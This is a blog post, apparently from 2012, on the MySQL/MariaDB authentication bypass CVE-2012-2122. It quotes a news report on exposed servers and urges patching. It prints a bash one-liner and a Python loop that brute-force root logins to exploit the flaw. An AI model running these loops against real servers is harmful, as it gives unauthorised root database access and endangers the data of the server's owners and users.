The latest news that has hit the streets is the occurence of the easiest hack ever, if you have local shell access (any user privelege level) and you can connect to MySQL – you can get root access to MySQL within a few seconds.<\/p>\n
I tried this yesterday on one of my servers on Ubuntu 12.04 running the latest version of MySQL in the repo…and it worked in about 30 seconds. Scary really, you can use this single line of bash to hack MySQL:<\/p>\n
[sh]while [ 1 ];do mysql -u root –password=123; done[\/sh]<\/p>\n
Or the Python version I originally saw:<\/p>\n
\r\n#!\/usr\/bin\/python\r\nimport subprocess\r\n\r\nwhile 1:\r\n subprocess.Popen(\"mysql -u root mysql --password=blah\", shell=True).wait()<\/pre>\nSecurity experts have identified some 879,046 servers vulnerable to a brute force flaw that undermines password controls in MySQL and MariaDB systems.<\/p>\n
According to Rapid7 security chief HD Moore, one in every 256 brute force attempts could override authentication controls on the servers and allow any password combination to be accepted. An attacker only needed to know a legitimate username which in most circumstances included the name \u2018root\u2019.<\/p>\n
The flaw has already been exploited. Moore reported that the flaw (CVE-2012-2122) was already patched for both MySQL and MariaDB, but many MySQL administrators had not fixed the hole in their deployments.<\/p>\n
Upon scanning 1.7 million publicly exposed MySQL servers, he found more than half (879,046) vulnerable to the \u201ctragically comedic\u201d flaw.<\/p><\/blockquote>\n
There’s a lot of vulnerable servers out there, so you better hope they aren’t yours because it’s not hard to scan whole subnets for servers with port 3306 open that accept connections from the outside world.<\/p>\n
And if your server is in that state – it’s vulnerable. I just checked the repos for Ubuntu 10.04 LTS and Ubuntu 12.04 LTS and they both have a patched version of MySQL available for download so I suggest you get on your servers and do –<\/p>\n
aptitude update; aptitude safe-upgrade<\/pre>\nIf you are using a shitty OS that uses yum or something – figure it out yourself.<\/p>\n